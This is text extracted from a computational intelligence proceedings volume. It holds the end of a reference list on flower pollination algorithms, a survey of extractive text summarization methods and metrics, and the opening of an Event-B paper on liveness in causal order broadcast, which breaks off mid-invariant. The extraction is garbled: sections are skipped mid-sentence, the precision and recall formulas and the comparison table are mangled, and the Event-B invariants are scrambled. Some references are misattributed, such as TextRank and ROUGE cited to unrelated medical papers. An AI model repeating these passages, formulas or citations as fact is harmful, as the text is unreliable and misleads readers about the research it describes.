13. Khan, Z. A., Zafar, A., Javaid, S., Aslam, S., Rahim, M. H., Javaid, N. (2019). Hybrid
meta-heuristic optimization based home energy management system in smart grid. Journal
of Ambient Intelligence and Humanized Computing, 1–17.
14. Alyasseri, Z. A. A., Khader, A. T., Al-Betar, M. A., Awadallah, M. A., & Yang, X. S. (2018).
Variants of the flower pollination algorithm: A review. Nature-inspired algorithms and applied
optimization (Vol. 744, pp. 91–118). Cham: Springer.
15. Abdel-Raouf, O., & Abdel-Baset, M. (2014). A new hybrid flower pollination algorithm
for solving constrained global optimization problems. International Journal of Applied
Operational Research-An Open Access Journal, 4, 1–13.
16. Pavlyukevich, I. (2007). Lévy flights, non-local search and simulated annealing. Journal of
Computational Physics, 226, 1830–1844.
17. Sayed, S. A. F., Nabil, E., & Badr, A. (2016). A binary clonal flower pollination algorithm for
feature selection. Pattern Recognition Letters, 77, 21–27.
18. Abdel-Baset, M., & Hezam, I. (2016). A hybrid flower pollination algorithm for engineering
optimization problems. International Journal of Computer Applications, 140, 10–23.
19. Mahata, S., Saha, S. K., Kar, R., & Mandal, D. (2018). Optimal design of wideband digital
integrators and differentiators using hybrid flower pollination algorithm. Soft Computing, 22,
3757–3783.
20. Mohanty, B. (2020). Hybrid flower pollination and pattern search algorithm optimized sliding
mode controller for deregulated AGC system. Journal of Ambient Intelligence and Humanized
Computing, 11, 763–776.
21. Abdel-Basset, M., & Shawky, L. A. (2019). Flower pollination algorithm: A comprehensive
review. Artificial Intelligence Review, 52, 2533–2557.
22. Alweshah, M., Qadoura, M. A., Hammouri, A. I., Azmi M. S., & AlKhalaileh, S. (2020). Flower
pollination algorithm for solving classification problems. International Journal Advance Soft
Computer Application, 12
23. Tawhid, M. A., & Ibrahim, A. M. (2020). Hybrid binary particle swarm optimization and flower
pollination algorithm based on rough set approach for feature selection problem. In Nature-
inspired computation in data mining and machine learning, (pp. 249–273).
Automatic Extractive Summarization
for English Text: A Brief Survey
Abstract In recent years, due to the popularity of the Internet, digital documents are
growing at an exponential rate on the Web. To save time and quickly know about the
document(s), a text summary system is required because the manual text summary
takes time, effort, and cost, that produces a summary automatically from the source
document(s). A summary contains key phrases and other related essential text mate-
rial with no alteration of the key information and the general context of the source
document(s). The text summary process began in the 1958 s, and researchers continue
to try and improve the summary of texts. The process of summary is either extrac-
tive or abstractive. The extractive text summarization extracts the most appropriate
sentences, phrases, or word from the text/document(s), then incorporates them in the
summary while the abstractive text summarization system results in a summary of
phrases other than the from the input text/document(s). This review paper describes
preprocessing, features, methods, evaluations, and future directions in the extractive
text summarization research. This study describes the advantages and shortcomings
of each method and compares them using precision, recall, and F-score and finds
that deep learning-based methods produce excellent results when adequate training
summaries are available.
1 Introduction
In today’s world, Internet users are increasing exponentially day by day. So large
amounts of information and documents, in digital form, are available online. It is
not an easy job to quickly and summarily find the corresponding information and
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 183
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_15
184 S. Dhankhar and M. K. Gupta
Fig. 1 Categorization
factors of text summarization
summarization system generates summaries in the same language as the input lan-
guages while multilingual systems use different language document(s) and generate
the summaries in one of input document(s) languages. The cross-lingual systems,
the input document(s) language, and summary language are not the same.
A summary may be categorized as generic, domain-specific, and query-based
according to the purpose factor. Generic summary do not concern any class, subject,
or domain. This is for general use containing all the information present in the docu-
ments, while the domain summaries refer to a particular area of interest. In contrast,
query-based systems produce the summaries on the basis of a user query. Based
on the output factor, text summarization can be classified as extractive and abstrac-
tive. Extractive summaries are produced by selecting important words, phrases, and
sentences from the source document(s) while abstractive summaries are human-like
summaries that contain words, phrases, and sentences not featured in the source
document(s). In other words, advanced natural language processing techniques are
required to generate abstractive summaries [6].
The extractive summaries are easier to generate because the source document(s)
ensure the baseline levels of grammatically and accuracy. On the other hand, abstrac-
tive summaries are hard to generate because it requires paraphrasing, generalization,
and the real-world knowledge. This paper focuses on features, techniques and meth-
ods, and evaluation of extractive text summarization.
The paper is arranged as follows: Sect. 2 describes extractive summarization.
Section 3 illustrates the various features of text summarization systems. Section 4
describes the different methods proposed in the literature for extractive text summa-
rization. Section 5 compares the different methods that we have presented in Sect. 4.
Section 6 introduces the various performance matrices for evaluating methods for
extractive text summarization, and Sect. 7 concludes the paper and presents future
guidance for the study into extractive text summarization research.
Features can be categorized as word and sentence level [7]. Word-level features
score each word and sentence-level features are used to score each sentence and then
high score sentences extracted to produce a summary [8]. Table 1 contains different
features that are used by researchers in recent time.
This section addresses the different techniques and methods of extractive text sum-
marization used periodically by different researchers to increase the quality of the
summary. We described and briefly illustrated each of these methods in the rest of
this section.
4.1 Statistical-Based
This method uses some statistical techniques to identify important sentences or words
in a document(s). These techniques assign the weights to sentences or words without
considering the meaning or relation of sentences or words. Some statistical techniques
are word probability [1, 9], TF-IDF [7, 10, 11], title word [12, 13], proper-noun
[12, 13], thematic word [12], keywords [13, 14], numerical data [12, 13], sentence
position [7, 12], and sentence length [7, 12].
Automatic Extractive Summarization for English Text … 187
4.2 Graph-Based
The graphical sentencing methods were one of the most critical approaches which
have attracted the attention of many researchers in this area. Words or phrases are
shown in graphs as nodes and edges that combine the words and sentences of semantic
relation. Two essential techniques on a graph that provide promising results for the
ranking of phrases are TextRank [15] and LexRank [16]. Both documents define the
sentences and set them vertically in a weighted unlinked graph, then draw the edges
188 S. Dhankhar and M. K. Gupta
between the sentence pairs based on the relation of similarity between them. Using
the PageRank [17] algorithm on the graph, significant terms are chosen by the system
using a random walk on the graph.
GRAPHSUM, the new general purpose summarizer on the basis of a graphic
model, reveals multiwords similarities by looking at the rules of association [18].
Alzuhair and Al-Dhelaan [19] developed an improved weighting scheme by com-
bining several key steps to determine the similitude of two sentences by Jaccard
coefficient of similarity, TF*IDF, cosine and Topic signatures similarity, and then
use PageRank algorithm to the identity similarity measure.
4.3 Semantic-Based
4.4 Fuzzy-Based
document summary method based on the conditional random field (CRF) where
the problem of the summary is described as a problem of sequence labeling. Apply
support vector regression (SVR) to the query-centric multidocument with a number of
specified features to locate the related sentences in the document to be summarized
[34]. Fattah [35] proposed a multidocument hybrid machine learning model with
maximum entropy (ME), Naive Bayes, and support vector machine (SVM). The
SVM classifier aims to find optimum hyperplane between the classes “Summary”
and “Non-Summary” with its core feature in the SVM classifier. It is defined in Eq. 2:
Methods based on the neural network (NN) have recently become popular for extrac-
tive summarization. Deep neural networks are a model and processing of information
with several nonlinear neural network layers. Deep learning networks must have a
huge amount of training data for powerful representation and usable semantically
data, for example, the convolutional neural network (CNN) and recurrent neural net-
works (RNN); most deep learning approaches need labeled data for buildings with
millions of learning parameter in deep neural architecture.
Kågebäck et al. [38] uses continuous vector representations to represent sentences
of multidocument for extractive summarization. Continuous vectors are based on
recursive autoencoder on a standard dataset using the ROUGE evaluation measures.
Kim [39] trains simple CNN with one convolution layer on top of word vectors from
an unsupervised neural language model [40] applied CNN to represent the sentences
in continuous vector space, then selects sentences from the multidocument, by min-
imizing the cost based on the “prestige” and “diversity”. Zhong et al. [41] another
related research to solve the query-oriented multidocument summary problem by
using an unsupervised deep learning model called query-oriented deep extraction
(QODE). The QODE model has three elements: extraction, generation of the sum-
Automatic Extractive Summarization for English Text … 191
mary, and validation of the reconstruction. Finally, the most appropriate sentences
are selected using dynamic programming to create a summary.
Cheng and Lapata [43] develops a deep neural network-based hierarchical docu-
ment encoder and an attention-based content extractor for single document extractive
summarization. Sentence representations are obtained by using a single-layer CNN
with a max-overtime pooling operation that is then used as inputs to a standard
RNN that acquires document-level representations hierarchically. The highest score
sentences are selected using a long short-term memory (LSTM) decoder.
Yousefi-azar and Hamey [44] implemented an unsupervised deep neural network
that produces summary for single document based on a query. Using the deep autoen-
coder (AE), they have been able to learn the features from the term frequency and to
apply small random noise to the local terms frequency as a representation of AE input
and suggest such a noisy AE ensemble, the Ensemble Noisy Auto-Encoder (ENAE),
increasing average recall 11.2%. Nallapati et al. [45] presents SummaRuNNer that
is an extractive text summary two-layer two-way GRU-RNN sequence model for
sequential classification, where every sentence is visited sequentially in the original
order, and a judgment is made as to whether or not to be used in the description.
Yao et al. [46] presents a framework for extractive document reinforcement learn-
ing using the hierarchical CNN/RNN network architecture not only for generating
detailed functionality, but also for creating a collection of likely Deep Q-Network
(DQN) text behavior. At the same time, DQN discovers what sentence will be picked
in an approximation of the Q-value function based on content, salience, and redun-
dancy.
The latest research using deep learning methods is done by [42] that proposed
SummCoder for a generalized extractive text summarization system of unsupervised
deep learning for a single document. The sentence value is based on the importance of
the sentence information, the sentence novelty, and the sentence location in the doc-
ument. The summary result is obtained by choosing the top-score phrases restricted
by the default summary length.
The most recent research using deep learning-based methods is done by [47] that
proposed two approaches based on NN for the summarization task for Indian legal
judgment documents. In the first solution, a single unit which is a feed-forward NN
(FFNN) is made of an input layer, two hidden layers, and one output layer. The
architecture of the NN is shown in Fig. 3 and the second approach uses a recursive
LSTM-based NN that contains memory blocks known as LSTM cells, and one LSTM
cell consists of four interacting layers of the neural network.
6 Evaluation Matrices
Two types of evaluation metrics are used based on text quality and content evaluation.
In the text quality evaluation, the main parameters to measure the quality of text
are: it must be grammatically correct, no repetition of sentences (non-redundancy),
reference clarity, and a summary must contain coherent sentences and have some
structure.
Table 2 Comparison and evaluation of different methods(“-” means not defined)
Method name Advantages Limitations Reference No. Precision Recall F-score
Statistical-based Easy to implement Lack of uniformity in [1, 9–11] – – –
summary and important
sentences may not be
included in summary.
Graph-based It offers a greater Sentences in graphs are [16] – 0.087 –
interpretation of critical indicated by bag of
sentences words that use similarity
measures that cannot
recognize semantically
identical sentences
[18] 0.099 0.093 0.097
[19] – – –
Semantic-based Semantically-related This approach uses [22] 0.554 0.542 0.548
sentences will be time-consuming SVD
generated by this method methodology, and the
summary generated
depends on the
consistency of the
Automatic Extractive Summarization for English Text …
semantic representation
of the source text
[23] – 0.05 –
[24] – 0.86 –
Fuzzy-Based A fuzzy method is This method can be an [27] 0.4734 0.4918 0.4824
similar to the issue of real issue of repetition in the
world that is not a world summary of the chosen
of two values (0 or 1) sentences, and it affects
summary accuracy. A
redundancy reduction
technique is therefore
required to enhance the
accuracy of final
summary
193
(continued)
Table 2 (continued)
194
Intrinsic evaluations are further classified into two categories according to content
evaluation: co-selection and content-based evaluation. Recall, precision, and F-score
are used in the matrices for co-selection [51]. Let S A represent the number of sen-
tences in an automated summary, while SG represents a total number of gold sum-
mary sentences. Precision(P), recall(R), and F-score(F) can be expressed in the
following equations:
S ∩S
P= A G (3)
SA
S A ∩SG
R= (4)
SG
2∗ P ∗ R
F= (5)
P+R
The biggest issue with precision and recall is the very different evaluation of
two perfectly strong automated generation summaries. Saggion et al. [52] proposed
cosine similarity, unit-overlap that is based on unigram or bi-gram and longest com-
mon subsequence (LCS) of content-based evolution methods comparing similarities
among summaries. The biggest disadvantage of these methods is how the results are
correlated with human judgment.
“Recall-Oriented Understanding for Gisting Evaluation (ROUGE)” [51] is also
a content-based evaluation method uses n-gram matching to automatically evaluate
system-generated summaries with human-generated summaries. ROUGE contains
many packages to evaluate system-generated summary but here we are discussing
only those which are commonly used by the researchers:
• ROUGE-N: In this case, N refers to the N-gram length. It is a recall-oriented
measure based on N-grams (mostly bi-gram and tri-gram) comparison. To cal-
culate the score, we take N consecutive words from the system-generated and
gold summaries and then find the total matching words between them and lastly,
divide the N-grams from the gold summary. The drawback of this strategy is that
N consecutive words are required for the match.
• ROUGE-L: L stands for LCS. Unlike ROUGE-N, it automatically identifies the
longest in-sequence word matching, at the sentence level, between the system-
generated and the gold summaries. The final score is calculated to sum all the sen-
tence level LCS. The longer LCS of two summaries, the more similarity between
these two summaries. There are two advantages of this measure: (1) It does not
require consecutive word matches. (2) No predefined length of N-gram is required.
The disadvantage of this measure is that it does not consider the short sequences
in the final score.
• ROUGE-SU: SU stands for skip bi-gram and unigram. It consists of skip bi-gram
between two words with arbitrary distance in the sentence order. If the distance is
196 S. Dhankhar and M. K. Gupta
very large then it produces misleading bi-gram matching. Therefore, the maximum
skip distance of 4, i.e., ROUGE-SU4.
The biggest disadvantage of ROUGE evaluation methods is that the people may
disagree on gold summaries because these summaries may be biased. However,
ROUGE is widely used by the researchers for the evaluation purpose of automatically
generated summaries.
7 Conclusion
The Summarization of the text is an important research subject for researchers since
the manual text is time-intensive and costly because of the vast volume of text on
the Internet. We concentrate on the extractive summaries because it does not require
much linguistic knowledge and then we have listed different features used by the
different researchers in recent time. The most used features are sentence position,
sentence length, and TF-IDF feature. By comparing different methods of text sum-
marization, we concluded that deep learning methods outperform if enough training
data are available. Future research in text summarization includes improving widely
used features and finding the features which are compatible and adding accurate
grammatical summaries.
References
1. Lunh, H. P. (1958). The automatic creation of literature abstracts. IBM Journal of Research
Development, 2(2), 159–165.
2. Allahyari, M., Pouriyeh, S., Assefi,M., Safaei, S., Elizabeth, D., Juan, B., & Kochut, K. (2017).
Text summarization techniques: A brief survey. International Journal of Advanced Computer
Science and Applications, 8(10).
3. Yogan J. K., Goh, O. S., Basiron, H., Choon, N. K., & Suppiah, P. C. (2016). A review on
automatic text summarization approaches. Journal of Computer Science, 12(4), 178–190.
4. Magdum, P. G., & Rathi, S. (2021). A survey on deep learning-based automatic text summa-
rization models. In Advances in Artificial Intelligence and Data Engineering (pp. 377–392).
Springer.
5. Saggion, H., & Poibeau, T. (2013). Automatic text summarization: Past, present and future. In
Multi-source, multilingual information extraction and summarization (pp. 3–21). Springer.
6. See, A., Liu, P. J., & Manning, C. D. (2017). Get to the point: Summarization with pointer-
generator networks. arXiv preprint arXiv:1704.04368.
7. Patel, D., Shah, S., & Chhinkaniwala, H. (2019). Fuzzy logic based multi document summa-
rization with improved sentence scoring and redundancy removal technique. Expert Systems
with Applications, 134, 167–177.
8. Wang, S., Zhao, X., Li, B., Ge, B., & Tang, D. (2017). Integrating extractive and abstrac-
tive models for long text summarization. In 2017 IEEE International Congress on Big Data
(BigData Congress) (pp. 305–312). IEEE.
9. Vanderwende, L., Suzuki, H., Brockett, C., & Nenkova, A. (2007). Beyond SumBasic: Task-
focused summarization with sentence simplification and lexical expansion. Information Pro-
cessing and Management, 43(6), 1606–1618.
Automatic Extractive Summarization for English Text … 197
10. Güran, A., Uysal, M., Ekinci, Y., & Güran, C. B. (2017). An additive FAHP based sentence
score function for text summarization. Information Technology and Control, 46(1), 53–69.
11. Mori, H., Yamanishi, R., & Nishihara, Y. (2018). Detection of words accepted to dynamic
abstracts focusing on local variation of word frequency. Procedia Computer Science, 126,
1442–1449.
12. Abbasi-ghalehtaki, R., Khotanlou, H., & Esmaeilpour, M. (2016). Fuzzy evolutionary cellular
learning automata model for text summarization. Swarm and Evolutionary Computation, 30,
11–26.
13. Gambhir, M., & Gupta, V. (2017). Recent automatic text summarization techniques: A survey.
Artificial Intelligence Review, 47(1), 1–66.
14. Gupta, V., & Kaur, N. (2016). A novel hybrid text summarization system for Punjabi text.
Cognitive Computation, 8(2), 261–277.
15. Taketa, F. (1973). Structure of the felidae hemoglobins and response to 2, 3-diphosphoglycerate.
Comparative Biochemistry and Physiology Part B: Comparative Biochemistry, 45(4), 813–823.
16. Radev, D. R., & Erkan, G. (2004). LexRank : Graph-based centrality as salience in text sum-
marization. Journal of Artificial Intelligence Research, 22(1), 457–479.
17. Brin, S., & Page, L. (1998). The anatomy of a large-scale hypertextual Web search engine
BT—Computer networks and ISDN systems. Computer Networks and ISDN Systems, 30(1–
7), 107–117.
18. Baralis, E., Cagliero, L., Mahoto, N., & Fiori, A. (2013). GraphSum: Discovering correlations
among multiple terms for graph-based summarization. Information Sciences, 249, 96–109.
19. Alzuhair, A., & Al-Dhelaan, M. (2019). An approach for combining multiple weighting
schemes and ranking methods in graph-based multi-document summarization. IEEE Access,
7, 120375–120386.
20. Deerwester, S., Harshman, R., Susan, T., George, W., & Thomas, K. (1990). Indexing by latent
semantic analysis. Journal Of THe American Society For Information Science, 41(6), 391–407.
21. Gong, Y., & Liu, X. (2001). Generic text summarization using relevance measure and latent
semantic analysis. In Proceedings of the 24th annual international ACM SIGIR conference on
research and development in IR (pp. 19–25).
22. John, A., Premjith, P. S., & Wilscy, M. (2017). Extractive multi-document summarization using
population-based multicriteria optimization. Expert Systems with Applications, 86, 385–397.
23. Al-Sabahi, K., Zhang, Z., Long, J., & Alwesabi, K. (2018). An enhanced latent semantic analy-
sis approach for Arabic document summarization. Arabian Journal for Science and Engineer-
ing, 43(12), 8079–8094.
24. Cagliero, L., Garza, P., & Baralis, E. (2019). ELSA: A multilingual document summariza-
tion algorithm based on frequent itemsets and latent semantic analysis. ACM Transactions on
Information Systems, 37(2), 1–33.
25. Zadeh, L. A. (1965). Fuzzy sets. Information and Control, 8(3), 338–353.
26. Khosravi,H., Eslami, E., Kyoomarsi, F., & Dehkordy, P. K. (2008). Optimizing text summa-
rization based on fuzzy logic. In Computer and Information Science (pp. 121–130). Springer.
27. Esther Hannah, M., & Geetha. (2011). Automatic extractive text summarization based on fuzzy
logic: A sentence oriented approach. In International Conference on Swarm, Evolutionary, and
Memetic Computing (pp. 530–538). Springer.
28. Malallah, S., & Ali, Z. H. (2017). Multi-document text summarization using fuzzy logic and
association rule mining. IASJ, 41, 241–258.
29. Goularte, F. B., Nassar, S. M., Fileto, R., & Saggion, H. (2019). A text summarization method
based on fuzzy rules and applicable to automated assessment. Expert Systems with Applications,
115, 264–275.
30. Van Lierde, Hadrien, & Chow, Tommy. (2019). Learning with fuzzy hypergraphs: A topical
approach to query-oriented text summarization. Inf. Sci., 496, 212–224.
31. Neto, J. L., Freitas, A. A., & Kaestner, C. A. A. (2002). Automatic text summarization using
a machine learning approach. In Brazilian symposium on artificial intelligence (pp. 205–215).
Springer.
198 S. Dhankhar and M. K. Gupta
32. Conroy, J. M., & O’leary, D. P. (2001). Text summarization via hidden markov models. In Pro-
ceedings of the 24th annual international ACM SIGIR conference on research and development
in information retrieval (pp. 406–407).
33. Shen, D., Sun, J.-T., Li, H., Yang, Q., & Chen, Z. (2004). Document summarization using
conditional random fields (pp. 2862–2867).
34. Ouyang, Y., Li, W., Li, S., & Qin, L. (2011). Applying regression models to query-focused
multi-document summarization. Information Processing and Management, 47(2), 227–237.
35. Fattah, M. A. (2014). A hybrid machine learning model for multi-document summarization.
Applied Intelligence, 40(4), 592–600.
36. Verma, P., & Om, H. (2019). MCRMR : Maximum coverage and relevancy with minimal
redundancy based multi-document summarization. Expert Systems With Applications, 120,
43–56.
37. Khan, R., Qian, Y., & Naeem, S. (2019). Extractive based text summarization using k-means
and tf-idf. International Journal of Information Engineering & Electronic Business, 11(3),
38. Kågebäck, M., Mogren, O., Tahmasebi, N., & Dubhashi, D. (2014). Extractive summarization
using continuous vector space models. In Proceedings of the 2nd Workshop on CVSC (pp.
31–39).
39. Kim, Y. (2011). Convolutional Neural Networks for Sentence Classification.
40. Yin, W., & Pei, Y. (2015). Optimizing sentence modeling and selection for document summa-
rization. Ijcai, 1383–1389, 2015.
41. Zhong, S., Liu, Y., Li, B., & Long, J. (2015). Query-oriented unsupervised multi-document
summarization via deep learning model. Expert Systems With Applications, 42(21), 8146–8155.
42. Joshi, A., Fidalgo, E., Alegre, E., Fernández-robles, L. (2019). SummCoder : An unsupervised
framework for extractive text summarization based on deep auto-encoders. Expert Systems
With Applications, 129, 200–215.
43. Cheng, J., & Lapata, M. (2016). Neural summarization by extracting sentences and words (pp.
484–494).
44. Yousefi-azar, M., & Hamey, L. (2017). Text summarization using unsupervised deep learning.
Expert Systems With Applications, 68, 93–105.
45. Nallapati, R., Zhai, F., & Zhou, B. (2017). Summarunner: A recurrent neural network based
sequence model for extractive summarization of documents. In Proceedings of the AAAI Con-
ference on Artificial Intelligence (Vol. 31).
46. Yao, K., Zhang, L., Luo, T., & Yanjun, W. (2018). Neurocomputing deep reinforcement learning
for extractive document summarization. Neurocomputing, 284, 52–62.
47. Anand, D., & Wagh, R. (2019). Effective deep learning approaches for summarization of legal
texts. Journal of King Saud University-Computer and Information Sciences.
48. Mani, I., House, D., Firmin, T., & Sundheim, B. (2002). Summac: A text summarization
evaluation. Natural Language Engineering, 8(1), 43–68.
49. Over, P., Dang, H., & Harman, D. (2007). DUC in context. Information Processing and Man-
agement, 43(6), 1506–1520.
50. Jones, K. S. (1998). Automatic summarising: Factors and directions (pp. 1–21).
51. Tsuchiya, G. (1971). Postmortem angiographic studies on the intercoronary arterial anasto-
moses: Report I. Studies on intercoronary arterial anastomoses in adult human hearts and
the influence on the anastomoses of structures of the coronary arteries. Japanese Circulation
Journal, 34(12), 1213–1220.
52. Saggion, H., Radev, D., Teufel, S., & Lam, W. (2002). Meta-evaluation of summaries in a cross-
lingual environment using content-based metrics. In COLING 2002: The 19th International
Conference on Computational Linguistics.
Formal Verification of Liveness
Properties in Causal Order Broadcast
Systems Using Event-B
Abstract Distributed systems have complex designs which are difficult to under-
stand and verify. A rigorous specification of such systems using mathematical tech-
niques such as formal methods is required to understand their precise behavior. Safety
property implies that the system is free from deadlocks and safe with respect to the
invariants, while the liveness property ensures that the system eventually makes
progress. Various group communication protocols are one of the building blocks of
reliable distributed systems applications. One of the message ordering protocols is the
causal order broadcast in which message delivery at various processes takes places
as per causal order. This paper presents how the liveness properties are preserved
by message passing in causal order using Event-B. An incremental model for causal
order-based message passing is constructed using Event-B specification. The prop-
erties of causal order broadcast are first specified using an abstract model, and then,
details are added with each refinement step. Liveness property is ascertained by
ensuring enabledness preservation and non-divergence among various refinements
and is expressed as invariants in the model of causal order broadcast system.
P. Yadav (B)
Dr. A.P.J. Abdul, Kalam Technical University, Lucknow 226021, India
e-mail: poojayadav255@gmail.com
R. Suryavanshi
Pranveer Singh Institute of Technology, Kanpur 209305, India
e-mail: raghuraj.suryavanshi@gmail.com
D. Yadav
Institute of Engineering and Technology, Lucknow 226021, India
e-mail: dsyadav@ietlucknow.ac.in
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 199
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_16
200 P. Yadav et al.
1 Introduction
The two main components of an Event-B model [5, 6] are contexts and machines [7].
The static part of the model is comprised of contexts which contain sets, axioms, and
constants. Sets can be of two types, carrier, or enumerated. The properties of these
sets and constants are defined by axioms. The behavioral properties of the model are
represented by machines which contain the system variables, theorems, invariants,
and events. The state of the machine is defined by variables. The constraints that
must be applied on the machine’s variables are represented by the invariants of the
machine [4]. First, an abstract machine is modeled, and then, it is refined to intro-
duce more concrete specifications [8]. Every state of the machine during execution
must satisfy all the invariants [9]. The events in the model define how the state of the
machine may evolve. An event comprises of guards and actions. The list of actions of
an event is invoked only if all the guards associated with that event become true [10].
Proof obligations are used to verify the properties of a machine through consistency
checking and refinement checking [7, 11]. Event-B tools discharge prove obligations
using automatic prover or through interaction [7]. The detailed description of nota-
tions of Event-B is given in [12]. Several B tools are available such as Rodin [7],
B-Toolkit [13], Atelier B [14] Click’n’Prove [15]. We have used Rodin platform [7,
16] for our research work. It has various embedded plugins such as model checkers,
provers, proof-obligation generator, UML transformers. Rodin provides a platform
for consistency and refinement checking through generation and discharge of proof
obligations.
Formal Verification of Liveness Properties … 201
The causal order was formally defined by Lamport in [17]. The causal order property
is a combination of FIFO order and local order property [18]. Birman, Schiper, and
Stephenson proposed causal ordering of messages in [19]. FIFO order property [20]
states that “if any site Si broadcasts a message M1 before broadcasting message M2
then each receiving site delivers M1 before M2.” Local order property [20] states
that “if any site Si delivers message M1 before broadcasting message M2 then every
receiving site delivers M1 before M2.” The causal order property states that “if
broadcasting of a message M1 causally precedes broadcasting of a message M2 then
delivery of message M1 at each site should be done before the delivery of message
M2.”
The remaining paper is organized as follows: Section 2 summarizes the literature
review, Section 3 gives the formal analysis of liveness property in causal order broad-
cast systems, Sections 4 and 5 demonstrate the analysis of enabledness preservation
and non-divergence property, respectively, in causal order broadcast systems, and
Section 6 provides a conclusion to the work done.
2 Literature Review
Extensive research has been done in the field of formal modeling, and verification
of various protocols related to distributed systems. Event-B is one such platform for
formal development of distributed system protocols. [12] demonstrates the formal
verification of atomic commitment of distributed transaction. The paper also caters to
the difficulties that arise when updates occur in a replicated database and issues that
occur while maintaining consistency among various replicas of the database. [10]
highlights the formal development of an incremental model of total order broadcast
in distributed transactions using Event-B. Formal verification of safety and liveness
properties in distributed transactions is presented in [23]. Formal development and
verification of causal order-based load balancing protocol using Event-B are shown
in [20]. The details of various message ordering properties such as causal order and
total order are given in [22]. The paper highlights various aspects of causal order
broadcast and total order broadcast through events and invariants. An abstract model
of causal order broadcast is developed, and then, it is refined by adding the details at
each refinement stage. In this paper, we take the work forward by demonstrating the
liveness properties of causal order message passing-systems by ensuring enabled-
ness preservation and non-divergence through various refinements of causal order
broadcast model using Event-B and Rodin platform.
202 P. Yadav et al.
The details of Event-B model of causal order are given in [23]. First, an abstract
machine for reliable broadcast is developed, and then, it is refined abstract causal
order. In the next refinement, we proceed toward vector clocks. The vector clock
rules replace the abstract causal order. The various stages of refinement of causal
order broadcast model are described below.
Abstract Machine: Figure 1 shows the abstract machine for causal order broadcast.
In the abstract machine, PROC and MSG are sets of processes and messages, respec-
tively, and PROC is a finite set. Variables assumed are sender and causaldeliver.
Invariants 1 and 2 give sender and causaldeliver definition as mapping from MSG to
PROC and relation of PROC and MSG, respectively. Invariant 3 states that processes
that delivered the message will be in set of processes that sent the message. In the
Event Broadcast, for any PROC p and MSG m, if m is not previously sent by the
sender process then it is broadcast to all processes, and the variable sender is updated.
In the event Deliver, for any PROC p and MSG m, if message m is sent by sender and
is not delivered by the process then m is delivered by p, and the variable causaldeliver
is updated.
First Refinement: Figure 2 shows the first refinement of the causal order broadcast
machine. Typing invariant 4 defines causalorder as relation of MSG to MSG. Here,
ordering is done at the time of sending, so messages ordered will be in the set of
messages sent by the process as shown in invariant 5. Invariants 6 and 7 show that
causal ordering can be imposed only on those messages that have already been sent.
In the broadcast event, when a process p broadcasts a message m, then the updating of
the variable causalorder takes place as per the mappings specified by sender −1 [{p}]
× {m}. It shows that as per the FIFO order, all messages broadcast by the process p
before broadcasting the message m causally precede message m. Similarly, local order
is confirmed by showing the mappings in causaldeliver[{p}] × {m} which signify
that the messages causally delivered to the process p before process p broadcasts
message m also precede message m causally. In the deliver event, message m has not
yet been delivered at process p is ensured by guard 3. Process p belongs to the domain
value for each message and process is initialized as zero. In the broadcast event of
refinement-2, causal order of refinement-1 is replaced by vector clock rules. When
a message is broadcast by a process pp, then the vector clock value of process pp,
vtp(pp)(pp) is incremented by 1, which becomes the vector timestamp of message m.
Total number of messages sent by process pp is denoted by vtp(pp)(pp). In the event
Deliver, a message is delivered to a process only if the receiving process has delivered
all the previous messages from the sender of that message. The vector timestamp of
the receiver process is compared to the vector timestamp of the incoming message to
ensure that all the messages delivered by the sender of that message before sending
it and are also delivered at the receiver process.
Weaker notion of enabledness preservation as per Eq. (1) means that if the guards
of one of the events are triggered at the abstract level then the guards of one or
more events will also be triggered at the refinement level. The stronger notion of
enabledness preservation as per [23] states that if the guards of an event ai are
enabled in the abstraction then either the guards of its refining event r i or the guards
of one of the newly introduced events must also be enabled Eq. (2).
notion of enabledness preservation by adding the invariants 10, 11, and 12 in the first
refinement machine Refinement 1.
For weaker notion-Guard(Broadcast) ∨ Guard(Deliver) ⇒
Guard(Broadcast) ∨ Guard(Deliver).
Inv 10: ∀ m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ∨ (m ∈
dom(sender) ∧ (p → m) ∈ / causaldeliver) ⇒
(p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ∨ (m ∈ dom(sender) ∧ (p →
m) ∈/ causaldeliver) ∨ (p ∈ dom(deliveryorder))).
For stronger notion-Guard(Broadcast) ⇒ Guard(Broadcast).
Inv 11: ∀ m,p·((p ∈ PROC)∨(m ∈ MSG) ∨ (m ∈ / dom(sender)) ⇒
(p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender))).
Guard(Deliver) ⇒ Guard(Deliver).
Inv 12: ∀ m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p → m) ∈ /
causaldeliver) ⇒
(p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p → m) ∈ / causaldeliver) ∨
p ∈ dom(deliveryorder)).
The machine Refinement 2 also has two events Broadcast and Deliver which
refine the Broadcast and Deliver events, respectively, of the machine Refinement 1.
Similarly, we add the invariants 13, 14, and 15 to the machine Refinement 2 to prove
the weaker and stronger notion of enabledness preservation.
For weaker notion-Guard(Broadcast) ∨ Guard(Deliver) ⇒
Guard(Broadcast) ∨ Guard(Deliver).
Inv 13: ∀ pp,m,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender))∨ (m ∈
dom(sender) ∧ (p → m) ∈ / causaldeliver) ∨ (p ∈ dom(deliveryorder)) ⇒
(pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ∨ {nVTP = VTP(pp) ←{pp →
VTP(pp)(pp) + 1}} ∨ (m ∈ dom(sender)) ∨ ((pp → m) ∈ / causaldeliver) ∨ (∀p·(p ∈
PROC ∧ p = sender(m) ⇒ VTP(pp)(p) ≥ VTM(m)(p))) ∨ (VTP(pp)(sender(m))
= (VTM(m)(sender(m))) − 1)).
For stronger notion- Guard(Broadcast) ⇒ Guard(Broadcast).
Inv 14: ∀m,pp,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ⇒
